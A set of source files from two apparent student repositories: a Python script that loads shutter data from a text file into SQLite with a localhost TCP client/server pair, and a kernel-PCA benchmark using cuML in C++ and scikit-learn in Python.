"text": "[tool.poetry]\nname = \"yapp-backend-dev\"\nversion = \"0.1.0\"\ndescription = \"Yapp BackEnd Developer Challenge\"\nauthors = [\"Felipe Aranguiz\"]\n\n[tool.poetry.dependencies]\npython = \"^3.7\"\nsqlalchemy = \"^1.3.17\"\nmysql-connector-python = \"^8.0.20\"\nSQLAlchemy-serializer = \"^1.3.4\"\npython-dotenv = \"^0.13.0\"\n\n[tool.poetry.dev-dependencies]\nblack = {version = \"^19.10b0\", allow-prereleases = true}\nflake8 = \"^3.8.3\"\nflake8-bugbear = \"^20.1.4\"\npytest = \"^5.4.3\"\npytest-mock = \"^3.1.1\"\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n"
},
{
"alpha_fraction": 0.6305525302886963,
"alphanum_fraction": 0.6338028311729431,
"avg_line_length": 26.969696044921875,
"blob_id": "18225023a4a4ba1fa893321cebd7966d698bfbbb",
"content_id": "2e5c6f8c2e552fa9831ba5d85dcfc6ab56cb185c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 33,
"path": "/yapp_backend/seed.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "import csv\n\nfrom db import Base, Session, engine\nfrom models import Movie\n\n\ndef seed_data(file_path):\n \"\"\"Populates MySQL DataBase with data from csv file\n Format should follow this Kaggle example:\n https://www.kaggle.com/ruchi798/movies-on-netflix-prime-video-hulu-and-disney/data#\n \"\"\"\n # Create Schema\n Base.metadata.create_all(engine)\n\n # Create SQL Session\n session = Session()\n\n # Read csv file and add data to session\n with open(file_path, newline=\"\") as csvfile:\n reader = csv.reader(csvfile, delimiter=\",\")\n next(reader, None) # skip headers\n columns = Movie()._csv_columns\n for row in reader:\n movie_data = {key: val for key, val in zip(columns, row)}\n movie_data.pop(\"index\")\n session.add(Movie(**movie_data))\n\n session.commit()\n session.close()\n\n\nif __name__ == \"__main__\":\n seed_data(\"yapp_backend/data.csv\")\n"
},
{
"alpha_fraction": 0.5254237055778503,
"alphanum_fraction": 0.5540391802787781,
"avg_line_length": 29.695945739746094,
"blob_id": "458174e4fc589e880c6d61ed4bcdb251796618ee",
"content_id": "c42c814938f07cd42d459df8fbb382d82eb78024",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4543,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 148,
"path": "/yapp_backend/tests/unit/test_handler.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "import json\n\nimport pytest\n\nfrom yapp_backend import app as api\n\n\[email protected]()\ndef apigw_event():\n \"\"\" Generates API GW Event\"\"\"\n\n return {\n \"body\": '{ \"test\": \"body\"}',\n \"resource\": \"/{proxy+}\",\n \"requestContext\": {\n \"resourceId\": \"123456\",\n \"apiId\": \"1234567890\",\n \"resourcePath\": \"/{proxy+}\",\n \"httpMethod\": \"POST\",\n \"requestId\": \"c6af9ac6-7b61-11e6-9a41-93e8deadbeef\",\n \"accountId\": \"123456789012\",\n \"identity\": {\n \"apiKey\": \"\",\n \"userArn\": \"\",\n \"cognitoAuthenticationType\": \"\",\n \"caller\": \"\",\n \"userAgent\": \"Custom User Agent String\",\n \"user\": \"\",\n \"cognitoIdentityPoolId\": \"\",\n \"cognitoIdentityId\": \"\",\n \"cognitoAuthenticationProvider\": \"\",\n \"sourceIp\": \"127.0.0.1\",\n \"accountId\": \"\",\n },\n \"stage\": \"prod\",\n },\n \"queryStringParameters\": {\"foo\": \"bar\"},\n \"headers\": {\n \"Via\": \"1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)\",\n \"Accept-Language\": \"en-US,en;q=0.8\",\n \"CloudFront-Is-Desktop-Viewer\": \"true\",\n \"CloudFront-Is-SmartTV-Viewer\": \"false\",\n \"CloudFront-Is-Mobile-Viewer\": \"false\",\n \"X-Forwarded-For\": \"127.0.0.1, 127.0.0.2\",\n \"CloudFront-Viewer-Country\": \"US\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"X-Forwarded-Port\": \"443\",\n \"Host\": \"1234567890.execute-api.us-east-1.amazonaws.com\",\n \"X-Forwarded-Proto\": \"https\",\n \"X-Amz-Cf-Id\": \"aaaaaaaaaae3VYQb9jd-nvCd-de396Uhbp027Y2JvkCPNLmGJHqlaA==\",\n \"CloudFront-Is-Tablet-Viewer\": \"false\",\n \"Cache-Control\": \"max-age=0\",\n \"User-Agent\": \"Custom User Agent String\",\n \"CloudFront-Forwarded-Proto\": \"https\",\n \"Accept-Encoding\": \"gzip, deflate, sdch\",\n },\n \"pathParameters\": {\"proxy\": \"/examplepath\"},\n \"httpMethod\": \"POST\",\n \"stageVariables\": {\"baz\": \"qux\"},\n \"path\": \"/examplepath\",\n }\n\n\ndef test_movie_list_handler(apigw_event, mocker):\n event_mods = dict(\n body=dict(),\n pathParameters=dict(),\n queryStringParameters=dict(),\n httpMethod=\"GET\",\n )\n apigw_event.update(event_mods)\n\n ret = api.movie_list_handler(apigw_event, \"\")\n body = json.loads(ret[\"body\"])\n\n assert ret[\"statusCode\"] == 200\n assert \"data\" in body\n assert len(body[\"data\"]) > 0\n assert \"id\" in body[\"data\"][0]\n\n\ndef test_movie_get_handler(apigw_event, mocker):\n event_mods = dict(\n body=dict(),\n pathParameters=dict(id=158),\n queryStringParameters=dict(),\n httpMethod=\"GET\",\n )\n apigw_event.update(event_mods)\n\n ret = api.movie_get_handler(apigw_event, \"\")\n body = json.loads(ret[\"body\"])\n\n assert ret[\"statusCode\"] == 200\n assert \"data\" in body\n assert \"id\" in body[\"data\"]\n\n\ndef test_movie_create_handler(apigw_event, mocker):\n event_mods = dict(\n body=json.dumps(dict(title=\"Create Movie Test Ok\")),\n pathParameters=dict(),\n queryStringParameters=dict(),\n httpMethod=\"POST\",\n )\n apigw_event.update(event_mods)\n\n ret = api.movie_create_handler(apigw_event, \"\")\n body = json.loads(ret[\"body\"])\n\n assert ret[\"statusCode\"] == 200\n assert \"data\" in body\n assert \"id\" in body[\"data\"]\n assert body[\"data\"][\"title\"] == \"Create Movie Test Ok\"\n\n\ndef test_movie_update_handler(apigw_event, mocker):\n event_mods = dict(\n body=json.dumps(dict(id=3, title=\"PUT Test Ok\")),\n pathParameters=dict(),\n queryStringParameters=dict(),\n httpMethod=\"PUT\",\n )\n 
apigw_event.update(event_mods)\n\n ret = api.movie_update_handler(apigw_event, \"\")\n body = json.loads(ret[\"body\"])\n\n assert ret[\"statusCode\"] == 200\n assert \"data\" in body\n assert \"id\" in body[\"data\"]\n assert body[\"data\"][\"title\"] == \"PUT Test Ok\"\n\n\ndef test_movie_delete_handler(apigw_event, mocker):\n event_mods = dict(\n body=dict(),\n pathParameters=dict(),\n queryStringParameters=dict(id=5),\n httpMethod=\"DELETE\",\n )\n apigw_event.update(event_mods)\n\n ret = api.movie_delete_handler(apigw_event, \"\")\n\n assert ret[\"statusCode\"] == 200\n assert \"body\" not in ret\n"
},
{
"alpha_fraction": 0.6302585601806641,
"alphanum_fraction": 0.6341180801391602,
"avg_line_length": 21.53043556213379,
"blob_id": "da74d6dc14dd597be990d92c691adc8ddfdb6e8e",
"content_id": "d96d1edd520dd38b191c8a42af199143cbbee60b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2591,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 115,
"path": "/yapp_backend/app.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "import functools\nimport json\nimport logging\n\nfrom db import Session\nfrom models import Movie\n\nlog = logging.getLogger(__name__)\n\n\ndef handler_decorator(handler):\n \"\"\"Response Handler decorator\n Catches errors and handle sessions\n \"\"\"\n\n @functools.wraps(handler)\n def handler_wrapper(event, context):\n try:\n session = Session()\n data = handler(event, context, session)\n\n response = {\"statusCode\": 200}\n\n if data:\n response[\"body\"] = json.dumps({\"data\": data})\n\n return response\n\n except Exception as e:\n return {\"statusCode\": 500, \"body\": json.dumps({\"error\": e.args})}\n\n finally:\n session.close()\n\n return handler_wrapper\n\n\n@handler_decorator\ndef movie_list_handler(event, context, session):\n \"\"\"GET /movie/list Handler\n Returns:\n JSON with list of all movies\n \"\"\"\n movies = session.query(Movie).order_by(Movie.title).all()\n return [movie.to_dict() for movie in movies]\n\n\n@handler_decorator\ndef movie_get_handler(event, context, session):\n \"\"\"GET /movie/{id} Handler\n Returns:\n JSON with movie matching URL id parameter\n \"\"\"\n movie_id = event[\"pathParameters\"][\"id\"]\n\n movie = session.query(Movie).get(movie_id)\n\n return movie.to_dict() if movie else None\n\n\n@handler_decorator\ndef movie_create_handler(event, context, session):\n \"\"\"POST /movie Handler\n Request Body:\n JSON following Movie model\n Returns:\n JSON with new movie added to DB\n \"\"\"\n payload = json.loads(event[\"body\"])\n\n new_movie = Movie(**payload)\n\n session.add(new_movie)\n session.commit()\n\n return new_movie.to_dict()\n\n\n@handler_decorator\ndef movie_update_handler(event, context, session):\n \"\"\"PUT /movie Handler\n Request Body:\n JSON following containing Movie id and new title. example:\n {\n \"id\": 3,\n \"title\": \"Star Wars\"\n }\n Returns:\n JSON with modified movie data\n \"\"\"\n payload = json.loads(event[\"body\"])\n movie_id = payload.pop(\"id\")\n\n movie = session.query(Movie).get(movie_id)\n movie.title = payload[\"title\"]\n session.commit()\n\n return movie.to_dict()\n\n\n@handler_decorator\ndef movie_delete_handler(event, context, session):\n \"\"\"DELETE /movie?id={id} Handler\n URL Params:\n Query String containing Movie id to delete, example:\n ?id=153\n Returns:\n Status code of resulting operation\n \"\"\"\n movie_id = event[\"queryStringParameters\"][\"id\"]\n\n session.query(Movie).filter(Movie.id == movie_id).delete()\n session.commit()\n\n return None\n"
},
{
"alpha_fraction": 0.5628930926322937,
"alphanum_fraction": 0.5943396091461182,
"avg_line_length": 16.66666603088379,
"blob_id": "343390928cdede125098aba81ef238e5c58f6b17",
"content_id": "51758f738b5a387b840580333b1c6423f0094e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 18,
"path": "/docker-compose.yml",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "version: \"3\"\n\nservices:\n database:\n image: mysql:8\n container_name: db\n ports:\n - \"3306:3306\"\n volumes:\n - db-data:/var/lib/mysql\n environment:\n - MYSQL_DATABASE=yapp\n - MYSQL_ROOT_PASSWORD=root\n - MYSQL_USER=docker\n - MYSQL_PASSWORD=pass\n\nvolumes:\n db-data:\n"
},
{
"alpha_fraction": 0.7921478152275085,
"alphanum_fraction": 0.7921478152275085,
"avg_line_length": 21.789474487304688,
"blob_id": "5196ed00a521acd9408c8c2778be20b50a4cf269",
"content_id": "eda2a3901ad2591a21342266e959c3df7a8900f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 19,
"path": "/yapp_backend/db.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "import os\nfrom dotenv import load_dotenv\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\n# Get DATABASE_URL from .env file\nload_dotenv()\ndatabase_url = os.getenv(\"DATABASE_URL\")\n\n# Create engine\nengine = create_engine(database_url)\n\n# Create Session Maker\nSession = sessionmaker(bind=engine)\n\n# Create Base schema Class\nBase = declarative_base()\n"
}
] | 10 |
Drahow/python_sqlite
|
https://github.com/Drahow/python_sqlite
|
f43efe977eae2612ce8374136569889b2b3fa327
|
2d96b74a59c0ef1ddd518788770dd3ebb988cdee
|
e57aa466baea6b13434f9b055fe800a078b39e40
|
refs/heads/master
| 2020-03-10T07:24:34.554504 | 2018-04-21T14:49:45 | 2018-04-21T14:49:45 | 129,262,151 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4735877811908722,
"alphanum_fraction": 0.4824427366256714,
"avg_line_length": 28.673076629638672,
"blob_id": "f6f842f1e1b8a2bbda6ba3a8bfb081a2ca5acdf7",
"content_id": "0e9d9d5cc1462c15d41d45f8f37e8da59d2bec52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3443,
"license_type": "no_license",
"max_line_length": 330,
"num_lines": 104,
"path": "/Python_Sqlite/parser_shutter.py",
"repo_name": "Drahow/python_sqlite",
"src_encoding": "UTF-8",
"text": "import re\r\nimport sqlite3\r\nimport os\r\n\r\nclass insertsql(object):\r\n\r\n def __init__(self,database_name):\r\n##对数据库操作之前,先备份\r\n os.system('mkdir sql.bk')\r\n os.system('cp %s sql.bk'%database_name)\r\n conn = sqlite3.connect(database_name)\r\n cursor = conn.cursor()\r\n ##先删除数据库中之前的数据\r\n cursor.execute('delete from shutter where pos >= 0')\r\n cursor.close()\r\n conn.commit()\r\n conn.close\r\n \r\n shutter_list = []\r\n\r\n##逐行读取txt文本中的内容,并保存在shutter_list表格中 \r\n def readtxt(self,name):\r\n shutter_list = []\r\n f = open(name , 'r')\r\n lines = f.readlines()\r\n for line in lines:\r\n if line != '\\n':\r\n line = line.strip('\\n')\r\n shutter_list.append(line)\r\n print(shutter_list)\r\n return shutter_list\r\n\r\n \r\n##获取元素attr的值,并返回\r\n def get_value(self,attr,attr_list,shutter_list):\r\n i = 0\r\n n = 0\r\n length = len(attr_list)\r\n \r\n while(1):\r\n if attr == attr_list[i]:\r\n n = i\r\n break\r\n else:\r\n i +=1\r\n if n < (length -1):\r\n Number1 = length - n - 2\r\n Number2 = 1\r\n else:\r\n Number1 = 0\r\n Number2 = 0\r\n if n < 9:\r\n restr = r'%s%s=(.*?),%s%s;'%(n*'.*?,',attr,Number1*'.*?,',Number2*'.*?')\r\n else:\r\n restr = r'pos=.*?,%s%s=(.*?)%s%s;'%((n-1)*'.*?,',attr,Number1*'.*?,',Number2*'.*?')\r\n \r\n cond = re.compile(restr,re.IGNORECASE)\r\n values = []\r\n for shutter_info in shutter_list:\r\n value = cond.findall(shutter_info)[0]\r\n values.append(eval(value))\r\n \r\n return values\r\n \r\n\r\n##将值与元素对应,并返回一个字典\r\n def parse_list(self,attr_list,value_list):\r\n\r\n count = 0\r\n value_dict = {}\r\n length = len(value_list)\r\n while count < length:\r\n value_dict[attr_list[count]] = value_list[count]\r\n count += 1\r\n return value_dict\r\n \r\n##将读取到的值更新到数据库\r\n def insertsql(self,n,value_dict,database_name):\r\n conn = sqlite3.connect(database_name)\r\n cursor = conn.cursor()\r\n\r\n ##插入数据库\r\n \r\n cursor.execute('insert into shutter (pos,maxnum,num,id,lock,sort,x,y,z,A) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'%(value_dict['pos'][n],value_dict['maxnum'][n],value_dict['num'][n],value_dict['id'][n],value_dict['lock'][n],value_dict['sort'][n],value_dict['x'][n],value_dict['y'][n],value_dict['z'][n],value_dict['A'][n]))\r\n cursor.close()\r\n conn.commit()\r\n conn.close\r\n \r\n \r\n\r\nif __name__=='__main__':\r\n insert = insertsql('shutter.sqlite')\r\n attr_list = ['pos','maxnum','num','id','lock','sort','x','y','z','A']\r\n shutter_list = insert.readtxt('shutter.txt')\r\n value_list = []\r\n for i in attr_list:\r\n values = insert.get_value(i,attr_list,shutter_list)\r\n value_list.append(values)\r\n value_dict = insert.parse_list(attr_list,value_list)\r\n length = len(value_list[0])\r\n n = 0\r\n while n < length:\r\n insert.insertsql(n,value_dict,'shutter.sqlite')\r\n n += 1\r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n"
},
{
"alpha_fraction": 0.599439799785614,
"alphanum_fraction": 0.6302521228790283,
"avg_line_length": 18.75,
"blob_id": "ed5d3c311ae684b85e0d7672d4f065df17ff5e3d",
"content_id": "f2bd0cd1e908d7b813ffb13a7c4f326e7f56906b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 794,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 36,
"path": "/TCP/server.py",
"repo_name": "Drahow/python_sqlite",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n#-*-coding:utf-8-*-\n\nimport socket\nimport time\nimport threading\n\n#创建socket对象\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n#获取树莓派主机名\n#host = socket.gethostname()\nhost = '127.0.0.1'\n#设置端口号\nport = 9999\n\n#绑定服务器地址和端口号\ns.bind((host,port))\n\n#监听,指定等待最大连接数5\ns.listen(5)\n\ndef tcplink(sock, addr):\n print('Accept new connection from %s:%s ' %addr)\n msg_recv = sock.recv(1024)\n sock.send(('Welcome %s' %msg_recv.decode('utf-8')).encode('utf-8'))\n while True:\n time.sleep(1)\n if msg_recv.decode('utf-8') == 'end':\n break\n\n sock.close()\nwhile True:\n sock, addr = s.accept()\n t = threading.Thread(target = tcplink, args=(sock, addr))\n t.start()\n \n"
},
{
"alpha_fraction": 0.557692289352417,
"alphanum_fraction": 0.5961538553237915,
"avg_line_length": 19,
"blob_id": "23f9d9017513dd4e48ada9b36859886f5e18094a",
"content_id": "eb23ea6894fe8008bde5c83edcf543ced4a68313",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 566,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 26,
"path": "/TCP/client.py",
"repo_name": "Drahow/python_sqlite",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n#-*-coding=utf-8-*-\n\nimport socket\nimport sys\nimport time\n\nhost = '127.0.0.1'\n#设置主机名端口号\nport = 9999\n#s.connect((host,port))\nwhile True:\n#创建TCP套接字,基于IPV4协议\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n#连接服务器\n s.connect((host,port))\n time.sleep(1)\n msg_send = input('Info want to send: ')\n if msg_send == 'end':\n break\n else: \n s.send(('%s'%msg_send).encode('utf-8'))\n msg_recv = s.recv(1024)\n print(msg_recv.decode('utf-8'))\n \ns.close()\n"
}
] | 3 |
ChristianRahn/moneystack
|
https://github.com/ChristianRahn/moneystack
|
cb5cdc50a7e2cc2ce5c0aac15f0f67827796803a
|
1d5d99bcc1d88f92fc30ba89b2a2fc872431f595
|
d4e658902d0402f97b29835475711a233f06918e
|
refs/heads/master
| 2016-09-06T19:12:42.014724 | 2013-04-07T23:31:21 | 2013-04-07T23:31:21 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7260273694992065,
"alphanum_fraction": 0.7287670969963074,
"avg_line_length": 27.153846740722656,
"blob_id": "63d950f6cda79b72141c07adf7b1133924b481d6",
"content_id": "c929692aef9f06b13c3009976c2fe9510cffc5e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 13,
"path": "/scripts/RemoveLineBreaks.py",
"repo_name": "ChristianRahn/moneystack",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport argparse\nimport fileinput\n\nparser = argparse.ArgumentParser(description='Remove line breaks from Splitwise CSV dumps')\nparser.add_argument('--input', dest='input', help='Source file')\n\nargs = parser.parse_args()\n\nfor lines in fileinput.FileInput(args.input, inplace=1):\n lines = lines.strip()\n if lines == '': continue\n print lines"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.7708333134651184,
"avg_line_length": 37.599998474121094,
"blob_id": "540794431e97fcb1e067c21d86ad011d8f4ada87",
"content_id": "898b0760ebf1e3288cdff3f0b4bb999a5ca284a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 5,
"path": "/README.md",
"repo_name": "ChristianRahn/moneystack",
"src_encoding": "UTF-8",
"text": "# Bearing the moneyload over time\n\nA graphical analysis in a closed system of who bears the most money load (is owed the most) over an amount of time.\n\nPulling Splitwise data... at some point."
},
{
"alpha_fraction": 0.45780590176582336,
"alphanum_fraction": 0.4905063211917877,
"avg_line_length": 25.36111068725586,
"blob_id": "91091a642af4a1e0fa79e0cd8c513dc2674d3b3f",
"content_id": "f498d63814e34bf29e745da144c97f0a40eb2ee5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 948,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 36,
"path": "/moneystack.js",
"repo_name": "ChristianRahn/moneystack",
"src_encoding": "UTF-8",
"text": "(function(d3) {\n var margin = {top: 20, right: 20, bottom: 30, left: 50},\n width = 960 - margin.left - margin.right,\n height = 500 - margin.top - margin.bottom;\n \n console.log(margin);\n\n var x = d3.time.scale()\n .range([0,width]);\n \n var y = d3.scale.linear()\n .range([height,0]);\n \n var xAxis = d3.svg.axis()\n .scale(x)\n .orient(\"bottom\");\n \n var yAxis = d3.svg.axis()\n .scale(y)\n .orient(\"left\");\n \n var area = d3.svg.area()\n .x(function(d) {return x(d.date)})\n .y0(function(d) {return d.y0;})\n .y1(function(d) {return d.y0 + d.y1;});\n \n var stack = d3.layout.stack()\n .values(function(d) {return d.values;});\n \n var svg = d3.select(\"body\").append(\"svg\")\n \n d3.csv(\"splitwise.csv\", function(error, data) {\n console.log(data);\n console.log(error);\n });\n})(d3);"
}
] | 3 |
karussell/directions-api-python
|
https://github.com/karussell/directions-api-python
|
6ed658d46c865795e83d6aab9ec3871433475845
|
fa5775a24eea6f0eff39a83edba44eb7222ac385
|
9ed5e284dda1bda89a200f215505ef22fd3b02d5
|
refs/heads/master
| 2020-04-06T03:37:36.232174 | 2016-07-11T13:13:45 | 2016-07-11T13:13:45 | 63,068,949 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7534562349319458,
"alphanum_fraction": 0.7580645084381104,
"avg_line_length": 19.66666603088379,
"blob_id": "a6e6ecd4168050520f8908457f3a82df5dccaa6a",
"content_id": "09318a11c4c273cb4344049ef0e38b908f3cad71",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 434,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 21,
"path": "/README.md",
"repo_name": "karussell/directions-api-python",
"src_encoding": "UTF-8",
"text": "# Try GraphHopper Directions API with Python\n\nThis repository contains a python test project to create a simple map displaying maps and in future versions using \nthe python client of the GraphHopper Route Optimization API. It uses [folium](https://github.com/python-visualization/folium) to create the maps.\n\n## Installation\n\n```\npip install folium\n```\n\n## Run\n\n```\npython test.py\nfirefox osm.html\n```\n\n## License\n\nApache License 2.0\n"
},
{
"alpha_fraction": 0.6075156331062317,
"alphanum_fraction": 0.7014613747596741,
"avg_line_length": 27.176469802856445,
"blob_id": "d8bfed2662fed2a9227d876ddf470ec7237339cd",
"content_id": "ceef3580f3fe63b5af2a3606458f11dc45b17a62",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 479,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 17,
"path": "/test.py",
"repo_name": "karussell/directions-api-python",
"src_encoding": "UTF-8",
"text": "import urllib, json\nimport folium\n\nmap = folium.Map(location=[49.838319, 6.4748])\n\nkey = \"016f1b38-62f0-4a2b-88f7-dc5b743a9b56\"\nurl = \"https://graphhopper.com/api/1/route?point=49.156562%2C6.47644&point=49.837982%2C6.47644&type=json&points_encoded=false&key=\" + key\n\nresponse = urllib.urlopen(url)\ndata = json.loads(response.read())\ntmp = data[\"paths\"][0][\"points\"]\n# print tmp\ngeo_data = { \"type\": \"LineString\", \"coordinates\": tmp[\"coordinates\"] };\n\nfolium.GeoJson(geo_data).add_to(map)\n\nmap.save('osm.html')\n"
}
] | 2 |
tjohanne/PCA
|
https://github.com/tjohanne/PCA
|
b879758dfcca2657a83bacc063c670223f8b1be1
|
7c201634767d475f682b07636f83f3db86ff01c6
|
531019738684a5d4b8023e4d1fd66b8930d8d1ec
|
refs/heads/main
| 2023-04-23T19:12:59.389300 | 2021-05-13T17:49:22 | 2021-05-13T17:49:22 | 361,269,049 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6217054128646851,
"alphanum_fraction": 0.6351421475410461,
"avg_line_length": 29.234375,
"blob_id": "ef42f0890500aad0b0b5517274a853bce8e78724",
"content_id": "c50de67dfb71a2aa62b46415311d20853aabf318",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1935,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 64,
"path": "/bench/cumlkpca/main.cpp",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "// main.cpp\n#include <stdio.h>\n#include <iostream>\n#include <cuml/decomposition/params.hpp>\n#include <cuml/decomposition/kpca.hpp>\n#include <cuml/matrix/kernelparams.h>\n\n#include <cuda_runtime.h>\n\n#include <raft/handle.hpp>\n#include <raft/mr/device/allocator.hpp>\n#include <raft/cudart_utils.h>\n#include <raft/linalg/cublas_wrappers.h>\n\n#include <raft/cuda_utils.cuh>\n#include \"../../src/csv.cpp\"\n\nint main(int argc, char *argv[]) {\n cudaStream_t stream = CUDA_CHECK(cudaStreamCreate(&stream));\n raft::handle_t handle;\n handle.set_stream(stream);\n std::cout << \"Here\\n\";\n // load data file\n std::string filename = argv[1];\n std::cout << \"Here\\n\" << \" ../../data/\" + filename;\n csvInfo csv = read_csv(\"../../data/\" + filename);\n std::cout << \"Here\\n\";\n\n // number of principal components to find\n int n_components = std::stoi(argv[2]);\n std::string kernel = argv[3];\n\n ML::paramsKPCA prms;\n float* data;\n float* trans_data;\n int len = csv.rows * csv.cols;\n raft::allocate(data, len);\n raft::allocate(trans_data, csv.rows * n_components); // transformed data\n\n std::vector<T> data_h = {1.0, 2.0, 5.0, 4.0, 2.0, 1.0};\n data_h.resize(len);\n raft::update_device(data, csv.matrix, len, stream);\n prms.n_cols = 2;\n prms.n_rows = 3;\n prms.n_components = 4;\n prms.kernel = MLCommon::Matrix::KernelParams{MLCommon::Matrix::LINEAR, 0, 0.0, 0.0};\n if(kernel == \"POLYNOMIAL\") {\n prms.kernel.kernel = MLCommon::Matrix::POLYNOMIAL;\n }\n else if(kernel == \"RBF\") {\n prms.kernel.kernel = MLCommon::Matrix::RBF;\n }\n else if(kernel == \"TANH\") {\n prms.kernel.kernel = MLCommon::Matrix::TANH;\n }\n else if(kernel != \"LINEAR\") {\n std::cout << kernel << \" is not a valid kernel type \" << std::endl;\n exit(1);\n }\n std::cout << \"prms.n_cols \" << prms.n_cols << std::endl;\n std::cout << \"kernel \" << prms.kernel.coef0 << std::endl;\n std::cout << \"kernel \" << prms.kernel.kernel << std::endl;\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5995989441871643,
"alphanum_fraction": 0.6176470518112183,
"avg_line_length": 32.977272033691406,
"blob_id": "d706ec13e8087378533cac0bd3e362f3edf934a4",
"content_id": "fdd167e58d81950032a076f6eac83f6bf71ad3c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1496,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 44,
"path": "/bench/kernelpca/kernelpca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import sklearn\nimport numpy as np\nfrom sklearn.decomposition import KernelPCA\nfrom scipy import linalg\nfrom scipy.sparse.linalg import eigsh\nfrom sklearn.utils.extmath import svd_flip\nfrom sklearn.utils.validation import check_is_fitted, _check_psd_eigenvalues\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import KernelCenterer\nfrom sklearn.metrics.pairwise import pairwise_kernels\nfrom sklearn import datasets\nfrom datetime import datetime as dt\n\n# test = \"manual\"\ntest = \"iris\"\n\nX = np.array([[1.0, 2.0, 5.0], [4.0, 2.0, 1.0]]).T\n\nif test == \"iris\":\n print(\"Loading iris dataset\")\n iris = datasets.load_iris()\n X = iris.data\n y = iris.target\nprint(\"Shape\", X.shape)\ntime_init_pca = dt.now()\nkpca = KernelPCA(n_components=None\n , kernel='linear'\n , gamma=None\n , degree=3\n , coef0=1\n , kernel_params=None\n , alpha=1.0\n , fit_inverse_transform=False\n , eigen_solver='auto'\n , tol=0\n , max_iter=None\n , remove_zero_eig=False\n , random_state=None\n , copy_X=True\n , n_jobs=-1)\nkpca.fit_transform(X)\n\n# print(\"SKLEARN KPCA Time for fit_transform {}ms\".format((dt.now() - time_fit_transform).microseconds / 1000))\nprint(\"SKLEARN KPCA Total time for fit_transform {}ms\".format((dt.now() - time_init_pca).microseconds / 1000))\n\n"
},
{
"alpha_fraction": 0.647948145866394,
"alphanum_fraction": 0.6954643726348877,
"avg_line_length": 24.5,
"blob_id": "073f5898e2fd624b95c1a0e5bfae80fede1c94a8",
"content_id": "6606d75528e22d142af864122345a18ea8a9d41d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 18,
"path": "/scripts/compute_profile.sh",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
